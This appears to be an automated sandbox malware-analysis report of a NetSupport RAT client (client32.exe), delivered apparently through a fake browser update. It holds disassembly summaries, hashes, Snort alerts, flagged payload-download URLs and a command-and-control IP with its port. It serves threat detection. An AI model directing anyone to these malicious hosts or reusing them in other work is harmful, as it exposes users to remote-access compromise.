e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 1101617D
m_hImageList, xrefs: 11016182

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitIconImageLastList_MessageProcessReplacewsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
API String ID: 2426217062-4007669474
Opcode ID: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
Instruction ID: 8e65b7ad63f8a8bd737c5e548218eb9c2c83e8f30b1cb0f0ee6871e24481aec6
Opcode Fuzzy Hash: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
Instruction Fuzzy Hash: B8D02B756402297BC3108A88DC01FD5F38CCF15371F040336F961522C0D9B0A4408B94

Uniqueness

Uniqueness Score: -1.00%

Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100114B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001136
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4

Uniqueness

Uniqueness Score: -1.00%

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001016
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390

Uniqueness

Uniqueness Score: -1.00%

Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8

Strings

AudioCapture.dll, xrefs: 1100D5F3

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoadVersion
String ID: AudioCapture.dll
API String ID: 3209957514-2642820777
Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20

Uniqueness

Uniqueness Score: -1.00%

Function 11014170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001200,00000000,00000000), ref: 1101419A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014180
e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101417B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
API String ID: 819365019-3507600817
Opcode ID: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
Instruction ID: 2522c449d059071d808e86b76c7b4b43721457dd443dfec71d59ac38f3b9efb9
Opcode Fuzzy Hash: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
Instruction Fuzzy Hash: A0D0A735F9033576E6205591AC4BFC5B2985B04B49F104165F121B90C1D2A0B4408648

Uniqueness

Uniqueness Score: -1.00%

Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 1111316A
SendMessageA.USER32(00000000,00000414,1111EE7B,00000000), ref: 11113180

Strings

MSOfficeWClass, xrefs: 11113165

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: MSOfficeWClass
API String ID: 1741975844-970895155
Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC

Uniqueness

Uniqueness Score: -1.00%

Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1115F323
..\ctl32\wndclass.cpp, xrefs: 1115F31E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
String ID: ..\ctl32\wndclass.cpp$m_hWnd
API String ID: 1417657345-2201682149
Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681

Uniqueness

Uniqueness Score: -1.00%

Function 110161B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

ImageList_GetImageCount.COMCTL32 ref: 110161CF

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 110161BA
m_hImageList, xrefs: 110161BF

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Image$CountErrorExitLastList_MessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
API String ID: 3979668856-4007669474
Opcode ID: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
Instruction ID: da6b7ee7688318b2dcaecae8c32772a12d0a8ac3ffe856306cb0240b92e991ba
Opcode Fuzzy Hash: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
Instruction Fuzzy Hash: 99D02230E40136ABC3209A94BC02BC9B3886F05208F0C0465F06256040E6B468808A84

Uniqueness

Uniqueness Score: -1.00%

Function 111100D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\Refcount.cpp, xrefs: 111100DE
this->hReadyEvent, xrefs: 111100E3

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorEventExitLastMessageProcesswsprintf
String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
API String ID: 2400454052-4183089485
Opcode ID: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
Instruction ID: 41d86d8e6b2fa9399a940e20fae9938a479a885d6893b5e9ee770bdda361f714
Opcode Fuzzy Hash: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
Instruction Fuzzy Hash: D4D01231E80736AFD7209AE5AC05BD6F3B85B04315F044539F012A6584DAB0A4458BE5

Uniqueness

Uniqueness Score: -1.00%

Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 1101D3B4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1101D3A3
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMenuMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1590435379-2830328467
Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384

Uniqueness

Uniqueness Score: -1.00%

Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe	Avira URL Cloud: Label: malware
Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z	Avira URL Cloud: Label: malware
Source: http://94.158.247.23/fakeurl.htm	Avira URL Cloud: Label: malware
Source: https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php	Avira URL Cloud: Label: malware
Source: https://magydostravel.com/cdn/zwmrqqgqnaww.php	Avira URL Cloud: Label: malware
Source: https://magydostravel.com/8	Avira URL Cloud: Label: malware

Source: magydostravel.com	Virustotal: Detection: 7%			Perma Link
Source: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe	Virustotal: Detection: 10%			Perma Link

Source: Traffic	Snort IDS: 2854911 ETPRO TROJAN Fake Browser Update Domain in DNS Lookup 192.168.2.6:49448 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2854914 ETPRO TROJAN Fake Browser Update Domain in TLS SNI 192.168.2.6:49705 -> 185.9.147.166:443
Source: Traffic	Snort IDS: 2827745 ETPRO TROJAN NetSupport RAT CnC Activity 192.168.2.6:49710 -> 94.158.247.23:5050

Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr	String found in binary or memory: http://%s/testpage.htm
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	String found in binary or memory: http://127.0.0.1
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: client32.exe, 00000012.00000002.1075326574.0000000005CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.247.23/fakeurl.htm
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000000.00000002.588248467.0000021D8FAC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
